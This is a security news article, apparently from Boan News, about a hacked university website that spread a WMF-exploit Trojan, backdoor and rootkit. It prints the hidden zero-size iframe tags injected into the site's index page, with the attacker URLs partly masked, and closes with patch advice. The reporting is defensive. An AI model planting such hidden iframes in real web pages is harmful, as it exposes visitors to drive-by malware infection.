Attacks exploiting the WMF vulnerability are continuing!
The Geot virus analysis lab (GCERT) announced, "At around 12:50 a.m. on the 17th, we found that a particular domestic university site was distributing the file sex.wmf."
When a user visits the hacked university site, the following code embedded in the index file is executed through a security vulnerability.
<iframe src=http://211**************/afu.htm width=0 height=0></iframe>
<iframe src="http://www.m*********.kr/index.html" width="0" height="0" frameborder="0">
When afu.htm and index.html run, they install the sex.wmf file below.
http://211**************/sex.wmf
In addition, new Trojans built to steal game information, such as explorer.exe (41,567 bytes) and dab1.dll (41,472 bytes), are installed in the system folder alongside it.
When sex.wmf is executed, a.exe is installed in the system folder, and it then attempts to install a backdoor program in the Windows folder with the hidden attribute set.
After that, myserver_HOOk.DLL runs, and its rootkit functionality keeps the file from being visible on the user's computer.
A Geot official warned, "Day after day, many sites like this one are distributing malicious Trojan programs to an unspecified number of visitors as a result of website tampering, so particular caution is called for."
To prevent infection through security vulnerabilities, it is important to use up-to-date antivirus software and Internet Explorer, and to always install Windows security patches.
He added, "The Outlook vulnerability patch (MS04-013) concerns an MHTML URL processing vulnerability that can occur even when Outlook Express is not used as the default e-mail program on the system, and this vulnerability is what gets exploited when a hacked site distributes Trojans."
Download and install the patch below that matches the Outlook version installed on your system; the 64-bit versions can also be downloaded directly from the links below.
http://www.microsoft.com/korea/technet/security/bulletin/MS04-013.asp
http://www.microsoft.com/korea/technet/security/bulletin/MS05-001.mspx
As Trojan variants exploiting the code-execution vulnerability in WMF files continue to be found, Microsoft has released an official patch as an emergency update.
<Target systems for installation>
Windows 2000(SP4), Windows XP(SP2), Windows 2003 Server
http://www.microsoft.com/technet/security/Bulletin/ms06-001.mspx
[Reporter Gil Min-kwon (is21@infothe.com)]
<Copyright: Boan News (www.boannews.com). Unauthorized reproduction and redistribution prohibited.>